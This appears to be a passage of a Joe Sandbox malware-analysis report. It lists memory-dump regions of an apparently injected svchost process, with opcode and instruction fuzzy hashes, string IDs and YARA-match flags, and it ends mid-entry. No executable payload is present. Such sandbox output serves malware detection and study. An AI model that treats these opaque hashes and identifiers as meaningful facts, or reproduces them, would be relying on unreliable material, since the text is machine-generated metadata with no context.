                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                          • Instruction ID: de69738bca26aab09e451f26a3882d74ea14f9395ea660894c422b55e20d1718
                                          • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                          • Instruction Fuzzy Hash: 38517872604305AFD721EF54CD40FAAB7F8FB84B50F04092DBA809B2A0D7B1E954CB95
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: LK
                                          • API String ID: 0-3496619222
                                          • Opcode ID: e2d358a88f1b9729e6168f07938800b68f223847e10ca7bd8275c0c8e4539e24
                                          • Instruction ID: 9ba215e90ef302cb23fa3af648b41c8e9579085b6a5809109bfc8d7766ee6520
                                          • Opcode Fuzzy Hash: e2d358a88f1b9729e6168f07938800b68f223847e10ca7bd8275c0c8e4539e24
                                          • Instruction Fuzzy Hash: 0A5182B3E14A214BD318CF09CC50631B692EFD8312B5B81BEDD199B357CA74E9529A90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: EXT-
                                          • API String ID: 0-1948896318
                                          • Opcode ID: 4b727eda413d6b17d6b9535ebb99220816a5a1de4fb35cb3d6c654595c926214
                                          • Instruction ID: 21f83fc0e2911a1b284390625cdc9e58a31a0de520c8bf6e8593683e988d60ba
                                          • Opcode Fuzzy Hash: 4b727eda413d6b17d6b9535ebb99220816a5a1de4fb35cb3d6c654595c926214
                                          • Instruction Fuzzy Hash: 26418076A083019BD710DB75CA84B6BB7E8BF88714F440D2DF985DB280EB75D904C79A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: P^
                                          • API String ID: 0-2008101720
                                          • Opcode ID: 4e6ab60901a2a98d6f67859f4b563a613c867f11412c2ca6fd13982333af56a9
                                          • Instruction ID: 9b46b326da877b73d076108d066f08b37a118464090ae3836a73a30cf9b2f8bf
                                          • Opcode Fuzzy Hash: 4e6ab60901a2a98d6f67859f4b563a613c867f11412c2ca6fd13982333af56a9
                                          • Instruction Fuzzy Hash: 2F412A76F002094BDB2CCD1DCE9835A7252EBE4305F1C827ADD056F7D1E6B8AE158680
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PreferredUILanguages
                                          • API String ID: 0-1884656846
                                          • Opcode ID: 429f081783d11c63b27201517ee6105645ede39115fdab76c1cb3547c2d0eb9c
                                          • Instruction ID: 41d73c71cceed6cf726749f2e6388583aa4094814e69624f26ebc3b890213ad4
                                          • Opcode Fuzzy Hash: 429f081783d11c63b27201517ee6105645ede39115fdab76c1cb3547c2d0eb9c
                                          • Instruction Fuzzy Hash: 1041E636D05219ABCF11DA94C941BEEF7B9EF44710F05016AE911EB354DAB0DE48CBA4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryHash
                                          • API String ID: 0-2202222882
                                          • Opcode ID: e6d4eaa618891ffa01522ac999162f7e0c31a470fadd53387f9aa5ba82bf82e3
                                          • Instruction ID: 5050e1ac809b3756096bbe2c335ae7b4af01d888695b53cc4544b52ddb942a9e
                                          • Opcode Fuzzy Hash: e6d4eaa618891ffa01522ac999162f7e0c31a470fadd53387f9aa5ba82bf82e3
                                          • Instruction Fuzzy Hash: 2E4145B5D0062CABDB21DB54CC84FDEB77CAB45714F4045E9E608EB240DB709E898FA8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: verifier.dll
                                          • API String ID: 0-3265496382
                                          • Opcode ID: 9ae3b7526a365b293466ce1bd8841c921e15d89f547e2c05b9a7152c0bcb7cb2
                                          • Instruction ID: 0d6f0649fefcb7a4e82c02fea64c8bf698d9348f0b97a41022c05c5199b2e6d8
                                          • Opcode Fuzzy Hash: 9ae3b7526a365b293466ce1bd8841c921e15d89f547e2c05b9a7152c0bcb7cb2
                                          • Instruction Fuzzy Hash: 153180B5A403019FDB24DF699950AB6B6F5EB49310F98887EE6099F381E7318C818B94
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Flst
                                          • API String ID: 0-2374792617
                                          • Opcode ID: 1cdf4a0237750d30059002fb375216ce37e3c0f1c1d772a12f1314767932ef6a
                                          • Instruction ID: 4af63eb8ca623391cb8efb56aff8c7f097b3532c009b5dd5689292bbb993af26
                                          • Opcode Fuzzy Hash: 1cdf4a0237750d30059002fb375216ce37e3c0f1c1d772a12f1314767932ef6a
                                          • Instruction Fuzzy Hash: 7A4198B56053019FC314CF18C184A16FBE4EB89754F28856EE44A8F391DB31D942CF99
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Actx
                                          • API String ID: 0-89312691
                                          • Opcode ID: f69a2859a1e5ac56c0f88511659ffabdf373a8f7619218792ca38fbe94be20d4
                                          • Instruction ID: 313eca75b1d8bfdd27de6b6c42c0c0b6de4610fd30712caa0cdb8affdd155dea
                                          • Opcode Fuzzy Hash: f69a2859a1e5ac56c0f88511659ffabdf373a8f7619218792ca38fbe94be20d4
                                          • Instruction Fuzzy Hash: E91160307096028BEB28C91D89546B6F6D9EF97264F3C852AE663CB391D773D8428780
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrCreateEnclave
                                          • API String ID: 0-3262589265
                                          • Opcode ID: 3bb02f52181d1ae565e87c0cd7d5bf62f2860f29af686cda255049f36c46e84e
                                          • Instruction ID: e22d107970d5fcf3c96b5fbb52aaa99cc56316aa6c842f6563b3f6a2b22e29a1
                                          • Opcode Fuzzy Hash: 3bb02f52181d1ae565e87c0cd7d5bf62f2860f29af686cda255049f36c46e84e
                                          • Instruction Fuzzy Hash: CF2134B1508344AFD320DF2AC804A9BFBE8EBD6B00F044A1EB5A08B250DBB09545CF96
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9121aec9a241616c6dd17ab1de8bb016cfb392964efc9ce52f41e69be5bb271b
                                          • Instruction ID: 4a280fbc98fe7c4eea95c4e384acc1f402609275edffabcb9cca38965550c36a
                                          • Opcode Fuzzy Hash: 9121aec9a241616c6dd17ab1de8bb016cfb392964efc9ce52f41e69be5bb271b
                                          • Instruction Fuzzy Hash: AB822472F102188FCB58CFADD8916DDB7F2EF88314B19812DE416EB349DA34AC568B45
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 21346d3ade96e5cff4840e3212de7c87c4cd7ce695049781e712288dca8429a9
                                          • Instruction ID: d01f84273497d64d6f25ce0e25f88195a1948a6e79f2864fcc216c859a925533
                                          • Opcode Fuzzy Hash: 21346d3ade96e5cff4840e3212de7c87c4cd7ce695049781e712288dca8429a9
                                          • Instruction Fuzzy Hash: 66628F3290464AAFCF24CF08D5904AEFB72BA56314B89C6DCCA9B27704D371BA55CBD1
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c94790cd9ae216031a0d54be32fbcb594dfe7af4d9be41aba7a831c8ba66d9b5
                                          • Instruction ID: 9504580056d2e77c62b22c7735c85e61f7cb15c7a9476a0c4d3f9918c5fd4746
                                          • Opcode Fuzzy Hash: c94790cd9ae216031a0d54be32fbcb594dfe7af4d9be41aba7a831c8ba66d9b5
                                          • Instruction Fuzzy Hash: E642C275A006168FDB14DF59C580ABEF7B6FF8C314B28866DD552AB340DB34E842CBA0
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                          • Instruction ID: eb35deafee5a148e98e8bfd7d17763f272ec6adeb0cd97324e3dbf259a8d3c2a
                                          • Opcode Fuzzy Hash: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                          • Instruction Fuzzy Hash: 89128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7e8bedf0ab1c44f63292438cd78a2988a66b23611060334857ab650ba675e3ba
                                          • Instruction ID: f26811ab4c5d29a51d2666c36dce220d8f4b6b8078d65854eea0a04cdbbb79b6
                                          • Opcode Fuzzy Hash: 7e8bedf0ab1c44f63292438cd78a2988a66b23611060334857ab650ba675e3ba
                                          • Instruction Fuzzy Hash: 6C32AC76E01219DBCF24DFA8C994BAEBBB5FF54714F18002AEC05AB381E7759911CB90
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 51fa90f2d6fc7e77e39bfeda8c69bf4a44f2136ea713ffea4c7b08cca53df2cc
                                          • Instruction ID: 284b4a40b1ba63394f27740b2aec2d0e1fdcd678752c98808c9f87a13c515515
                                          • Opcode Fuzzy Hash: 51fa90f2d6fc7e77e39bfeda8c69bf4a44f2136ea713ffea4c7b08cca53df2cc
                                          • Instruction Fuzzy Hash: 3432CD74A007558BEF24CF69CA547BEFBFAAF84314F28855EE4469B384D735A802CB50
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7285ebbdc8d6d1625025dd5f817c950a4b7d4a9f7caee0f677c7c49bb6e47cba
                                          • Instruction ID: 71246390a9ed15d8ad398fd047a3d5282335d68fa9d79f4e3d270904c84e7079
                                          • Opcode Fuzzy Hash: 7285ebbdc8d6d1625025dd5f817c950a4b7d4a9f7caee0f677c7c49bb6e47cba
                                          • Instruction Fuzzy Hash: CE22DF74A08691CBDB24CFA9C294772B7F1AF44300F0C859AE886CF785E735E562CB64
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a9ca1f758236a251bfed1a50216bfb3a6522f01011ad6bf9533e38a4539a7931
                                          • Instruction ID: fefc5ffeb383530c5e2180fd2e312fa1d8a101aa28224aed39ba449d7aceca20
                                          • Opcode Fuzzy Hash: a9ca1f758236a251bfed1a50216bfb3a6522f01011ad6bf9533e38a4539a7931
                                          • Instruction Fuzzy Hash: 3522D235A00216CFCB19CF59C590ABAF7B2FF8A354B28456DDA56DB344DB30E942CB90
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c867be53c2c554a3f566d98594122699f75c8394f273a8fa809e1c6b3fb0a79
                                          • Instruction ID: 713a091efd85b061d5f0daae6aa6635ce90b7cb63c11f0220c2d48bebeec2b20
                                          • Opcode Fuzzy Hash: 3c867be53c2c554a3f566d98594122699f75c8394f273a8fa809e1c6b3fb0a79
                                          • Instruction Fuzzy Hash: B222C074900609EFDB14DFA8C990BAEB7B5FF48310F2485A9E814AB345E734EA41CF94
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f3c9ed4017a950788a82ec1e33b39c764cc97a159b6fa27348b8f8f352682b8e
                                          • Instruction ID: f6a95d6246a762919c9bc2b7a830d9026c456047c68e0439d7a6c1d2335a00bf
                                          • Opcode Fuzzy Hash: f3c9ed4017a950788a82ec1e33b39c764cc97a159b6fa27348b8f8f352682b8e
                                          • Instruction Fuzzy Hash: 6522A0396047128FC718CF18C5A0A2AF7E5FF89314B188A6DEA96CB355D730E846CF95
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 921b4d64fdf1f3747df45ebbf0b0b76e4727f4034c00df19a952bb80b22f996e
                                          • Instruction ID: 4eea2e779686f4d18fae863b40b9a6ef5343e1f97b2945d1547aa2154636d119
                                          • Opcode Fuzzy Hash: 921b4d64fdf1f3747df45ebbf0b0b76e4727f4034c00df19a952bb80b22f996e
                                          • Instruction Fuzzy Hash: E8222C70E0021ADBDF14CF95C5809BEFBFAAF48704F5980AAE845AB641E734D942CB64
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 13bc9af504f2530e96f97f51d774b37fb01662b80aa5f0667db837b5a7e565b2
                                          • Instruction ID: 8c0abc78a8da9414d67baf34fc8c10ac618f3b6b71d50f8e6f646745f4709499
                                          • Opcode Fuzzy Hash: 13bc9af504f2530e96f97f51d774b37fb01662b80aa5f0667db837b5a7e565b2
                                          • Instruction Fuzzy Hash: C802F1386046518FDB24CF2AC560275FBF1AF85300B18899AEAD6CF385D734E996DF60
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 76af3d37fb99fd25720d3d2cfbc5b7e11662ce655a14b4671dc3a543c1aab988
                                          • Instruction ID: f9ed8900d0aeb0feac583f280e43213b4e6b9345a3805a930769628e90632104
                                          • Opcode Fuzzy Hash: 76af3d37fb99fd25720d3d2cfbc5b7e11662ce655a14b4671dc3a543c1aab988
                                          • Instruction Fuzzy Hash: 96F1D572E006159BCB18CFA9C9A067EFBF5EF8821071D41ADD456DB3C1E674EA41CB90
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                          • Instruction ID: 901dcd232d1a1a050e031e96c43c26619ad832ba1b1279c811f3fd1b07e6b428
                                          • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                          • Instruction Fuzzy Hash: 72026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 987e90e0317f7beebd37cfb0e00b4d08b2c0129b6aedab55b7fb7f44ae0aa99d
                                          • Instruction ID: b1aa32e138c63196a12cec60a54d469bd11cb139553bf05c460e55cca820a912
                                          • Opcode Fuzzy Hash: 987e90e0317f7beebd37cfb0e00b4d08b2c0129b6aedab55b7fb7f44ae0aa99d
                                          • Instruction Fuzzy Hash: 80F1A472E00626DBCB58CE68C5A15BDFBF5AF45210B1A426DD856EB3C0D734EE41CB90
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8010ce45e0ca5b65d77275f35b6bc2585a90d57dca97f7c3348b01d0fd3c1fd6
                                          • Instruction ID: a5d9c1cc6756645560d32020e50053c85bd54a0cb99d226ebeca0b9decb8939c
                                          • Opcode Fuzzy Hash: 8010ce45e0ca5b65d77275f35b6bc2585a90d57dca97f7c3348b01d0fd3c1fd6
                                          • Instruction Fuzzy Hash: 1CF19E74900609DFDB14DFA8C990AAEBBB4FF48314F2885A9E805AB345E735DE45CF90
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 97dcbc98dd073d32445dd83acc64614abdc571c4c56d133366cb7132bfb3e57b
                                          • Instruction ID: fc5695926bf62b9d70b73769767bef4fe7f839e459530ca2f36111d164f9f1ed
                                          • Opcode Fuzzy Hash: 97dcbc98dd073d32445dd83acc64614abdc571c4c56d133366cb7132bfb3e57b
                                          • Instruction Fuzzy Hash: 74D1D475A00B269BCF14DF64CD90ABEBBA5BF48304F0A862DE815DB280E734D951CF60
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ee857fa14aabb1be21e19baf028e6706fa68c92290f976f78203a0ac7558595e
                                          • Instruction ID: 3b7e56ce361057f84eb1eda0137a8e6e57f663a650ececcc2bca19ba4394d633
                                          • Opcode Fuzzy Hash: ee857fa14aabb1be21e19baf028e6706fa68c92290f976f78203a0ac7558595e
                                          • Instruction Fuzzy Hash: 56D16D71E043198BEF28CE98C6847BDBBB5FB44304F18807AEC46AB394D7B58942DB45
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 333c961a9cff4e48df7ab8e775c01a65bfe6ccee337e4c1d836dd67a6f2cbc31
                                          • Instruction ID: b207525476c52080fb5963b0f7b7b0a587839f7318416a3bd6bf9320df47fb20
                                          • Opcode Fuzzy Hash: 333c961a9cff4e48df7ab8e775c01a65bfe6ccee337e4c1d836dd67a6f2cbc31
                                          • Instruction Fuzzy Hash: ECE19E75A00205CFDB18CF58C980BAAB7F5FF58310F28819AE855EB391D734EA51CB90
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 287cd1c4acbb309d98da8b721ef8c94e526c49b68e608b292af005a6315e051b
                                          • Instruction ID: 21494e1d54f3fa5a7f6f1bc991ab6dbec104cc975d0865bb23e5cb7f729d50f8
                                          • Opcode Fuzzy Hash: 287cd1c4acbb309d98da8b721ef8c94e526c49b68e608b292af005a6315e051b
                                          • Instruction Fuzzy Hash: 61D1A330E003299FEB25DF25C994BAAF7B5AB49704F0840EDD909AB342DB74AD85CF51
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 405e4545d23e6fb1806599b31c255339c2895dcb403d3a20b6b260611907791c
                                          • Instruction ID: 81a68c6de8afb1d907fbccfbe3fa0bd8278a453d77ebdbbaf4a87c306e508e1d
                                          • Opcode Fuzzy Hash: 405e4545d23e6fb1806599b31c255339c2895dcb403d3a20b6b260611907791c
                                          • Instruction Fuzzy Hash: 23C19371E002159FEF25CF5AC940BAEFBB9EF55314F18826AD915AB390D770E942CB80
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                          • Instruction ID: 419b0005f14b0e3bf6aa7146815f086bd5a135973496a7311b4c7590387125fa
                                          • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                          • Instruction Fuzzy Hash: 3BB11875A00655AFDF26DB68CA50BBEFBFAEF84200F190199D642DB381DB30D942CB50
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ceca652abe237944913a9097d39f7c91e3a77b9f3614988b18095d378dece6dd
                                          • Instruction ID: 4faea40c2820b22c5fcc7fac65593395a82cbd17494c5d58d54f318269d9e4d0
                                          • Opcode Fuzzy Hash: ceca652abe237944913a9097d39f7c91e3a77b9f3614988b18095d378dece6dd
                                          • Instruction Fuzzy Hash: B4A13B75900215AFEF12EFA4CC95BAE77B9EF46750F054068FA00AF2A0D7759C10CBA4
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4221b2808ee087ba493f626103dd1ef2757fa7d8fe4cbc8f2c51a61941d6f1aa
                                          • Instruction ID: bdaff764204ba1014785d391d8eb2df08658de79e0794ff7b24941d0a5606772
                                          • Opcode Fuzzy Hash: 4221b2808ee087ba493f626103dd1ef2757fa7d8fe4cbc8f2c51a61941d6f1aa
                                          • Instruction Fuzzy Hash: 09C15874108341CFDB64CF15C584BAAB7E8FF89304F54496EE9898B391D774E909CB92
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 48bc216d829923493dd270a460af4106c0d14bddfc2769e2557a7001edde511e
                                          • Instruction ID: 2df9a3e8f7594e1d586e11595edcfc901b3f24a430b61e9a3bbf7f02362f5867
                                          • Opcode Fuzzy Hash: 48bc216d829923493dd270a460af4106c0d14bddfc2769e2557a7001edde511e
                                          • Instruction Fuzzy Hash: 28A1C275B0071ADBDB24DF69CA90BAAB7F5FF44314F544129EA059B381DB34E812CBA0
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d180cd0e904b8d180ff9598c2c6c366115c1c5e119618fe4c662eb9b05f85a85
                                          • Instruction ID: e879bded4ebd538b1e04037936284470d3c8512bd5666b691589c0908e484ab7
                                          • Opcode Fuzzy Hash: d180cd0e904b8d180ff9598c2c6c366115c1c5e119618fe4c662eb9b05f85a85
                                          • Instruction Fuzzy Hash: 02914635E002118BEB28DB28D540B7EB7E9FF84714F1944AEE8059F340E736D842C761
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3cb5f7391e0fe50eabf392035cd150940a4dbb4700d0086fa58e00fd5f0cd7d9
